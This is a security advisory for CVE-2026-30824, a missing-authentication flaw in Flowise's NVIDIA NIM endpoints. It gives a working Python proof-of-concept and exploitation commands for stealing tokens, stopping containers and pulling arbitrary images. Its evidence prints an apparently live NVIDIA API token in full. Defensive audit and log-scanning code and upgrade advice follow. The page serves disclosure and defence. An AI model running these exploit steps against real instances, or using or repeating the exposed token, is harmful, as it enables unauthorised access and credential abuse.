Summary
Missing Authentication on NVIDIA NIM Endpoints
The NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
Vulnerability Details
| Field | Value |
|---|---|
| CWE | CWE-306: Missing Authentication for Critical Function |
| Affected File | packages/server/src/utils/constants.ts |
| Affected Line | Line 20 ('/api/v1/nvidia-nim' in WHITELIST_URLS) |
| CVSS 3.1 | 8.6 (High) |
Root Cause
In packages/server/src/utils/constants.ts, the NVIDIA NIM route is added to the authentication whitelist:
```typescript
export const WHITELIST_URLS = [
    // ... other URLs
    '/api/v1/nvidia-nim', // Line 20 - bypasses JWT/API-key validation
    // ...
]
```
This causes the global auth middleware to skip authentication checks for all endpoints under /api/v1/nvidia-nim/*. None of the controller actions in packages/server/src/controllers/nvidia-nim/index.ts perform their own authentication checks.
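The effect of that single entry can be modelled and audited as follows. This is an added example, not Flowise code: it assumes the middleware treats each whitelist entry as a path prefix, and `isWhitelisted`, `auditWhitelist`, `ROUTES` and the `/api/v1/ping` entry are hypothetical; the NIM paths are the ones listed in this advisory.

```typescript
// Added example (not Flowise code). Assumption: the auth middleware exempts a
// request when its path equals a whitelist entry or sits below it.
type Route = { method: string; path: string; privileged: boolean };

const nim = (method: string, name: string): Route => ({
    method,
    path: `/api/v1/nvidia-nim/${name}`,
    privileged: true
});

// NIM routes named in the advisory, plus one constructed public route.
const ROUTES: Route[] = [
    nim('GET', 'get-token'),
    nim('GET', 'preload'),
    nim('GET', 'download-installer'),
    nim('GET', 'list-running-containers'),
    nim('POST', 'pull-image'),
    nim('POST', 'start-container'),
    nim('POST', 'stop-container'),
    nim('POST', 'get-image'),
    nim('POST', 'get-container'),
    { method: 'GET', path: '/api/v1/ping', privileged: false }
];

// Hypothetical matcher standing in for the middleware's whitelist check.
function isWhitelisted(path: string, whitelist: string[]): boolean {
    return whitelist.some((entry) => path === entry || path.startsWith(entry + '/'));
}

// Privileged routes that would be served without any authentication check.
function auditWhitelist(routes: Route[], whitelist: string[]): string[] {
    return routes
        .filter((r) => r.privileged && isWhitelisted(r.path, whitelist))
        .map((r) => `${r.method} ${r.path}`);
}

const WITH_NIM_ENTRY = ['/api/v1/ping', '/api/v1/nvidia-nim'];
const WITHOUT_NIM_ENTRY = ['/api/v1/ping'];

console.log(auditWhitelist(ROUTES, WITH_NIM_ENTRY)); // all nine NIM routes
console.log(auditWhitelist(ROUTES, WITHOUT_NIM_ENTRY)); // empty: auth applies again
```

Run as a CI check, a non-empty result from `auditWhitelist` is a signal that a privileged router has been placed on the exemption list.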
Affected Endpoints
| Method | Endpoint | Risk |
|---|---|---|
| GET | /api/v1/nvidia-nim/get-token | Leaks valid NVIDIA API token |
| GET | /api/v1/nvidia-nim/preload | Resource consumption |
| GET | /api/v1/nvidia-nim/download-installer | Resource consumption |
| GET | /api/v1/nvidia-nim/list-running-containers | Information disclosure |
| POST | /api/v1/nvidia-nim/pull-image | Arbitrary image pull |
| POST | /api/v1/nvidia-nim/start-container | Arbitrary container start |
| POST | /api/v1/nvidia-nim/stop-container | Denial of Service |
| POST | /api/v1/nvidia-nim/get-image | Information disclosure |
| POST | /api/v1/nvidia-nim/get-container | Information disclosure |
1. NVIDIA API Token Leakage
The /get-token endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.
Token obtained:
```json
{
  "access_token": "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",
  "token_type": "Bearer",
  "expires_in": 3600
}
```
Token validation:
```bash
curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
# Returns list of 170+ available models
```
2. Container Runtime Manipulation
On systems with Docker/NIM installed, an unauthenticated attacker can:
- List running containers (reconnaissance)
- Stop containers (Denial of Service)
- Start containers with arbitrary images
- Pull arbitrary Docker images (resource consumption, potential malicious images)
Proof of Concept
poc.py
```python
#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated
Usage:
  python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""
import argparse
import urllib.request
import urllib.error


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
    ap.add_argument("--path", required=True, help="NIM endpoint path")
    ap.add_argument("--method", default="GET", choices=["GET", "POST"])
    ap.add_argument("--data", default="", help="Raw request body for POST")
    args = ap.parse_args()

    url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
    body = args.data.encode("utf-8") if args.method == "POST" else None
    req = urllib.request.Request(
        url,
        data=body,
        method=args.method,
        headers={"Content-Type": "application/json"} if body else {},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            print(r.read().decode("utf-8", errors="replace"))
    except urllib.error.HTTPError as e:
        print(e.read().decode("utf-8", errors="replace"))


if __name__ == "__main__":
    main()
```
Exploitation Steps
```bash
# 1. Obtain NVIDIA API token (no authentication required)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token

# 2. List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers

# 3. Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
  --method POST --data '{"containerId":"<target_id>"}'

# 4. Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
  --method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'
```
Evidence
Token retrieval without authentication:
```console
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
{"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null}
```
Token grants access to NVIDIA API:
```console
$ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
{"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]}
```
Container endpoints return 500 (not 401) proving auth bypass:
```console
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
{"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}}
```
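The same status-code signal (a NIM endpoint answering with something other than 401) can be used to triage reverse-proxy access logs on affected versions. This is an added example, not part of the advisory: it assumes Common Log Format lines, the log lines and client addresses are constructed, and `parseNimHit` and `servedNimRequestsByClient` are hypothetical names.

```typescript
// Added example: group NIM-router requests that were served (not rejected
// with 401/403) by client address, so unexpected sources stand out.
const NIM_PREFIX = '/api/v1/nvidia-nim/';
const LINE_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) /;

type Hit = { client: string; method: string; endpoint: string; status: number };

function parseNimHit(line: string): Hit | null {
    const m = LINE_RE.exec(line);
    if (m === null) return null; // not a parsable access-log line
    const path = (m[3] ?? '').split('?')[0] ?? '';
    if (!path.startsWith(NIM_PREFIX)) return null;
    const status = Number(m[4]);
    if (status === 401 || status === 403) return null; // auth was enforced
    return {
        client: m[1] ?? '',
        method: m[2] ?? '',
        endpoint: path.slice(NIM_PREFIX.length),
        status
    };
}

function servedNimRequestsByClient(lines: string[]): Map<string, string[]> {
    const byClient = new Map<string, string[]>();
    for (const line of lines) {
        const hit = parseNimHit(line);
        if (hit === null) continue;
        const seen = byClient.get(hit.client) ?? [];
        seen.push(`${hit.method} ${hit.endpoint} -> ${hit.status}`);
        byClient.set(hit.client, seen);
    }
    return byClient;
}

// Constructed sample lines (documentation address ranges).
const SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2026:10:00:00 +0000] "GET /api/v1/nvidia-nim/get-token HTTP/1.1" 200 172',
    '198.51.100.7 - - [01/Jan/2026:10:00:02 +0000] "GET /api/v1/nvidia-nim/list-running-containers HTTP/1.1" 500 96',
    '192.0.2.10 - - [01/Jan/2026:10:01:00 +0000] "GET /api/v1/nvidia-nim/get-token HTTP/1.1" 401 40',
    '192.0.2.10 - - [01/Jan/2026:10:01:05 +0000] "GET /api/v1/chatflows HTTP/1.1" 200 512'
];

console.log(servedNimRequestsByClient(SAMPLE_LOG));
```

A served `get-token` request from an address that is not a known Flowise user is a reason to rotate the NVIDIA API credential configured on that instance.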
Impact
A critical operation is accessible without requiring any authentication. Typical impact: any user can invoke the privileged function.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-30824? CVE-2026-30824 is a high-severity missing authentication for critical function vulnerability in flowise (npm), affecting versions <= 3.0.12. It is fixed in 3.0.13. A critical operation is accessible without requiring any authentication.
- Which versions of flowise are affected by CVE-2026-30824? flowise (npm) versions <= 3.0.12 are affected.
- Is there a fix for CVE-2026-30824? Yes. CVE-2026-30824 is fixed in 3.0.13. Upgrade to this version or later.
- Is CVE-2026-30824 exploitable, and should I be worried? Whether CVE-2026-30824 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-30824 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-30824? Upgrade flowise to 3.0.13 or later.